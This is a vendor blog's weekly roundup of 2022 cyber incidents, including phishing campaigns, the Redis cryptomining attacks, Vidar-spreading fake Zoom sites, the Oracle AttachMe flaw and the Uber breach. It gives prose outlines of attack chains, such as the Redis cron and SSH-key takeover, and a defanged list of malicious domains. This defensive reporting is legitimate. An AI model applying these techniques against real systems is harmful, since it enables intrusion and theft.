---
title: "Weekly Cyber News Updates, week 38 of 2022 | Phish Protection"
description: "Weekly Cyber News Updates, week 38 of 2022: Governments, Businesses, and individuals can experience huge complications if they suffer a data breach. A small."
image: "https://phishprotection.com/og/blog/weekly-cyber-news-updates-week-38-2022.png"
canonical: "https://phishprotection.com/blog/weekly-cyber-news-updates-week-38-2022/"
---

Quick Answer

Governments, Businesses, and individuals can experience huge complications if they suffer a \[data breach\](/phishing/data-breaches-how-they-impact-small-businesses). A small vulnerability can expose sensitive information if they don't pay attention to detail.

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fweekly-cyber-news-updates-week-38-2022%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=Weekly%20Cyber%20News%20Updates%2C%20week%2038%20of%202022&url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fweekly-cyber-news-updates-week-38-2022%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fphishprotection.com%2Fblog%2Fweekly-cyber-news-updates-week-38-2022%2F "Share on Facebook") [ ](https://reddit.com/submit?url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fweekly-cyber-news-updates-week-38-2022%2F&title=Weekly%20Cyber%20News%20Updates%2C%20week%2038%20of%202022 "Share on Reddit") [ ](mailto:?subject=Weekly%20Cyber%20News%20Updates%2C%20week%2038%20of%202022&body=Check out this article: https%3A%2F%2Fphishprotection.com%2Fblog%2Fweekly-cyber-news-updates-week-38-2022%2F "Share via Email") 

![Phish Protection blog post image](https://media.mailhop.org/phishprotection/images/2022/09/spear-phishing-protection-4839.jpg) 

Governments, Businesses, and individuals can experience huge complications if they suffer a [data breach](/phishing/data-breaches-how-they-impact-small-businesses). A small vulnerability can expose sensitive information if they don’t pay attention to detail.

Implementing effective [phishing protection](/) measures can help mitigate different types of cyber attacks and the associated risks. Following is a summary of the **latest breach-related news** of this week.

### Netflix Threat Actors Stage a Credential Harvesting Heist

Over the past years, Netflix customers have been warned about various **phishing threats**, sharing a common theme, [credential harvesting](https://www.mgocpa.com/perspective/credential-harvesting/). Cybercriminals send phishing emails to convince users that their Netflix account is in jeopardy and **must update** their credit card details to rectify the situation.

[INKY](https://www.inky.com/en/blog/fresh-phish-netflix-bad-actors-go-behind-the-scenes-to-stage-a-credential-harvesting-heist?&web%5Fview=true)recently detected Netflix getting impersonated in a **PII data harvesting campaign** using compressed HTML attachments in zip files. The HTML attachments give the attackers a strategic advantage because they host the malicious website on the **victim’s machine**, not the Internet. Thus, they can avoid standard URL reputation checks, and the phishing content **does not get detected**.

![Spear phishing protection](https://media.mailhop.org/phishprotection/images/2022/09/spear-phishing-protection-4839.jpg) 

#### How the attack happens

In the campaign, the attackers **spoofed** all sender email addresses to look like they came from Netflix’s domain. They sent [phishing emails](/content/stop-phishing-emails/) from a malicious mail server controlled by a Peruvian university.

Recipients got a request to resolve an account issue by downloading an attached form .

The email contains a **zip file**, which unzips an [HTML attachment](https://www.bleepingcomputer.com/news/security/html-attachments-remain-popular-among-phishing-actors-in-2022/) that builds a Personally Identifiable Information (credit card info, billing address, date of birth, etc.) harvesting form hosted on the victim’s machine.

Clicking “Agree and Continue” **forwards the data** to a bad actor.

### Over 39k Unauthenticated and Internet-Exposed Redis Services Targeted in a Cryptocurrency Campaign

Redis is an **open-source** data structure tool used as an in-memory [message broker](https://www.g2.com/articles/message-broker), distributed database, or cache. The developers did not design the tool to get exposed on the Internet; however, researchers discovered multiple Redis instances publicly accessible , **missing authentication**.

Researcher Victor Zhu detailed the Redis[unauthorized access vulnerability](https://securityaffairs.co/wordpress/136045/hacking/redis-cryptocurrency-campaign.html?web%5Fview=true)that hackers could exploit and compromise Redis instances exposed online. “Under certain circumstances, if the Redis services run with the **root account**, attackers can write the root account’s **SSH public key file** and directly login to the victim’s server.

> 

It allows threat actors to delete or steal data, gain server privileges, or execute **encryption extortion**, critically endangering normal operations.

”

The experts discovered evidence demonstrating the **ongoing hacking campaign**, where threat actors used the file “/var/spool/cron/root” to store malicious [crontab](https://www.adminschoice.com/crontab-quick-reference) entries utilizing several prefixed Redis keys with the string ” backup .” The cybercriminals used the crontab entries to execute a **remote server-hosted** shell script.

The shell script:

Disables and stops running security-related processes.

Disables and stops running system monitoring processes

Removes and purges **all security-related** and system log files, including shell histories (e.g., .bash\_history).

Adds a **new SSH key** to the victim’s authorized\_keys file.

Disables the [iptables](https://www.howtogeek.com/177621/the-beginners-guide-to-iptables-the-linux-firewall/) firewall.

Installs several scanning and **hacking tools** like “masscan.”

Installs and runs the crypto mining application XMRig

### Hackers Steal Millions from Healthcare, Warns FBI

The FBI recently warned[healthcare organizations](https://cyware.com/news/hackers-steal-millions-from-healthcare-warns-fbi-c7b173c4)to be vigilant of cybercriminals targeting **payment processors**, who divert funds to their bank accounts. It further added that bad actors stole over $4.6 million this year by compromising access to user accounts and **altering the payment information**.

Cybercriminals’ dirty tricks:

They use publicly available personal information and [social engineering](/phishing-awareness/social-engineering-attack-twilio-compromises-employee-accounts-customer-data) techniques to gain unauthorized access to victims’ websites, payment details, and **healthcare portals**.

Furthermore, they **spoofed** support centers and gained access to companies handling and delivering healthcare reimbursements.

The threat actors can alter the **Exchange Server’s configurations** and rewrite the rules for targeted accounts, allowing them to receive the victim’s message copy.

Healthcare sector under attack

The healthcare sector has seen numerous [cybercriminal](/blog/cybercriminals-are-duping-millions-of-accounts-in-the-latest-facebook-phishing-campaign/) assaults in the recent past:

The Texas OakBend Medical Center suffered a [ransomware attack](/resources/ransomware-attack-why-organizations-pay-ransom) that disrupted its communication and IT systems.

HC3 noted that the Karakurt ransomware group carried out at least **four cyberattacks** affecting the U.S. **public health** and healthcare sectors since June.

Russia-based Evil Corp targeted the U.S. healthcare sector to gain **intellectual information** using tools like Dridex and other ransomware.

### 2-Step Email Attack Executes Payload Using Powtoon Video

According to a report, the attacks begin when the victim receives an email that suggests it contains an **invoice** from the British [email security](/resources/practices-for-email-security-learning-implementing-protecting) firm Egress.

> 

An Egress spokesperson said their investigation shows that the attack is a standard[brand impersonation](https://www.darkreading.com/attacks-breaches/email-attack-powtoon-video-execute-payload?&web%5Fview=true)tactic. “As you know, cybercriminals leverage many well-known and **trusted brands** to give legitimacy to their malicious attacks. In the reported instance, the recipients got a **phishing email** using an Egress Protect (email encryption) template.”

The spokesperson further added they could assure the users that there is no evidence that Egress became the victim of a [phishing attack](/resources/7-most-common-phishing-attacks-and-learning-to-protect-against-them). Furthermore, he dismissed all reports of **account takeover attacks** involving Egress employees or users as false. “The Egress customers or users need not take any action now.”

Once the user opens the scam Egress invoice, they are redirected to Powtoon, the **legitimate** video-sharing platform. The [threat actors](/phishing-awareness/threat-actors-using-malicious-onenote-attachments-to-spread-malware-via-phishing-emails) play a malicious video on Powtoon, ultimately presenting the user with a very convincing **malicious Microsoft login page** to harvest their credentials.

### Fake Zoom Sites Deploy Vidar Malware

CRIL (Cyble Research and Intelligence Labs) recently discovered[multiple fake Zoom sites](https://heimdalsecurity.com/blog/fake-zoom-sites-deploying-vidar-malware/?web%5Fview=true)designed to spread malware among Zoom users. The websites are designed with a **similar user interface**, and the malware seems like Zoom’s **legitime application**.

Details About the Malware

CRIL analyzed the [malware](/content/protection-against-malware/what-is-malware) and established that it was Vidar Stealer, a **malicious code** with links to the Arkei stealer. Vidar steals the following information from an **infected device**:

- Banking Information

Saved Passwords

IP Addresses

Browser history

Login credentials

Crypto-wallets

Following is a list of fake Zoom websites to avoid:

 zoom-download\[.\]host

 zoom-download\[.\]space

 zoom-download\[.\]fun

 zoomus\[.\]host

 zoomus\[.\]tech

 zoomus\[.\]website

How the Vidar Malware Works

The deceiving sites **redirect victims** to a GitHub URL to download a [malicious](https://www.bleepingcomputer.com/news/security/malicious-android-apps-with-1m-plus-installs-found-on-google-play/) application which, upon execution, drops the following binaries in the temporary folder :

 ZOOMIN\~1.EXE

 Decoder.exe

These files execute the **cybercriminal’s code** to steal information from the machine.

### Oracle Cloud Infrastructure: Critical Vulnerability Allows Unauthorized Access

A recently discovered vulnerability in **OCI (Oracle Cloud Infrastructure)** allows[unauthorized access](https://www.infosecurity-magazine.com/news/flaw-in-oracle-cloud-unauthorized/?&web%5Fview=true)to all users’ cloud storage volumes, violating cloud isolation. The flaw, which secure cloud experts at Wiz discovered and dubbed as **AttachMe**, is part of the new advisory the company published.

According to Oracle, they **patched the flaw** for all customers within 24 hours of getting informed by Wiz. However, Elad Gabay, Wiz’s senior software engineer, said that before patching, an attacker might have **leveraged** the vulnerability to target all OCI users.

“The attacker might have read from or written to any attached or unattached storage volumes allowing **multi-attachment** provided he had its [OCID (Oracle Cloud Identifier)](https://k21academy.com/1z0-1072/ocid-its-importance-in-oracle-cloud-oci/). Thus, it might have allowed **exfiltration** of sensitive data or the **initiation** of destructive attacks by executable file manipulation.”

The Wiz advisory states that the potential attacks resulting from a hacker aware of the flaw included **cross-tenant access** and privilege escalation.

![Prevent spear phishing](https://media.mailhop.org/phishprotection/images/2022/09/prevent-spear-phishing-7842.jpg) 

### Uber Suffers Breach, Hackers Steal Vulnerability Reports

According to sources, a [cyberattack](https://www.bbc.com/news/uk-england-gloucestershire-64917275) forced Uber to **shut down** several engineering and internal communications systems.

Uber recently confirmed that its[high-security internal systems](https://cyware.com/news/uber-suffers-breach-vulnerability-reports-stolen-3f5fc55b)were targeted in a data breach by a cybercriminal who claims to have access to Uber’s sensitive data. The company tweeted that it had informed the **law enforcement** authorities and is investigating the incident.

_The threat actors provided screenshots of Uber’s IT systems, Slack server, Windows domain, and email dashboard._ Additionally, they may have access to Uber’s **Google-hosted** **cloud** infrastructure and [Amazon Web Services](https://www.dincloud.com/news/aws-servers-breached-in-a-highly-sophisticated-cyber-attack/) dashboard.

As per the report published by The New York Times, the attacker targeted a Uber employee’s **Slack account** using social engineering to gain **initial access**. The attacker used the [stolen credentials](https://www.itworldcanada.com/article/cyber-security-today-jan-16-2023-hackers-use-stolen-credentials-to-beat-norton-password-manager-and-more/522116) and accessed Uber’s internal systems containing classified information. Uber did not confirm if any customer data was compromised.

### Microsoft 365 Phishing Attacks Spoof U.S. Govt Websites

A progressive [phishing](/resources/what-is-phishing) campaign targeting U.S. government contractors is expanding its operation to push better-crafted documents and **higher-quality lures**. The lure in the phishing emails is the request for bids for profitable government projects, redirecting victims to phishing pages that clone legitimate federal agency portals .

The[Cofense](https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time)report says the operatives expanded their targeting and now **spoof** the Department of Commerce and the Department of Transportation. Moreover, hackers are using many **unique lures** in the messages, removing grammatical typos in the attached PDFs and a better phishing web page behavior.

_The phishing emails, according to Cofense, now feature larger logos, more consistent formatting, and a link to the [PDF](https://tech.hindustantimes.com/tech/news/this-pdf-malware-attacks-apple-mac-users-don-t-fall-for-it-know-what-experts-say-71660823717188.html) instead of a file attachment._ The phishing websites also exhibit targeted improvements, like using **HTTPS** on all websites in the same domain .

## Topics

[ Announcements ](/tags/announcements/) 

![Brad Slavin](https://media.mailhop.org/phishprotection/images/authors/brad-slavin.jpg) 

[ Brad Slavin ](/authors/brad-slavin/) 

General Manager

Founder and General Manager of DuoCircle. Product strategy and commercial lead across DuoCircle's 2,000+ customer base.

[LinkedIn Profile →](https://www.linkedin.com/in/bradslavin) 

## Protect your inbox from phishing attacks

Real-time email security with 60-day free trial. No credit card required.

[Start Free Trial](https://portal.duocircle.com/cart.php?a=add&pid=101&brand=phishprotection) [View Pricing](/pricing/) 

## Related Articles

[  Intermediate 5m  Cybersecurity Updates For The Week 33 of 2022  Aug 22, 2022 ](/blog/cyber-security-news-update-week-33-2022/)[  Intermediate 6m  Cybersecurity Updates For The Week 41 of 2022  Oct 21, 2022 ](/blog/cybersecurity-news-21-oct-2022/)[  Intermediate 5m  Cybersecurity Updates For The Week 1 of 2021  Jan 1, 2021 ](/blog/cybersecurity-updates-for-the-week-1-of-2021/)[  Intermediate 6m  Cybersecurity Updates For The Week 1 of 2022  Jan 7, 2022 ](/blog/cybersecurity-updates-for-the-week-1-of-2022/)

```json
{"@context":"https://schema.org","@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://github.com/duocircle"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://phishprotection.com/contact/"},"knowsAbout":["Phishing Protection","Email Security","Anti-Phishing","Business Email Compromise","Ransomware Protection","Time of Click Protection","Office 365 Email Security","Advanced Threat Defense"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"Phish Protection","url":"https://phishprotection.com","description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","publisher":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}}
```

```json
{"@context":"https://schema.org","@type":"BlogPosting","headline":"Weekly Cyber News Updates, week 38 of 2022","description":"Weekly Cyber News Updates, week 38 of 2022: Governments, Businesses, and individuals can experience huge complications if they suffer a data breach. A small.","url":"https://phishprotection.com/blog/weekly-cyber-news-updates-week-38-2022/","datePublished":"2022-09-30T08:15:43.000Z","dateModified":"2026-04-17T15:43:10.000Z","dateCreated":"2022-09-30T08:15:43.000Z","author":{"@type":"Person","@id":"https://phishprotection.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://phishprotection.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin is the founder and General Manager of DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. He founded DuoCircle in 2014 and has led the company's growth to 2,000+ customers across its email security product family. Brad's focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/phishprotection/images/authors/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://github.com/duocircle"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://phishprotection.com/contact/"},"knowsAbout":["Phishing Protection","Email Security","Anti-Phishing","Business Email Compromise","Ransomware Protection","Time of Click Protection","Office 365 Email Security","Advanced Threat Defense"]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://phishprotection.com/blog/weekly-cyber-news-updates-week-38-2022/"},"articleSection":"intermediate","keywords":"Announcements","wordCount":1527,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/phishprotection/images/2022/09/spear-phishing-protection-4839.jpg","caption":"Phish Protection blog post image","width":1200,"height":630},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://phishprotection.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://phishprotection.com/blog/"},{"@type":"ListItem","position":3,"name":"Intermediate","item":"https://phishprotection.com/intermediate/"},{"@type":"ListItem","position":4,"name":"Weekly Cyber News Updates, week 38 of 2022","item":"https://phishprotection.com/blog/weekly-cyber-news-updates-week-38-2022/"}]}
```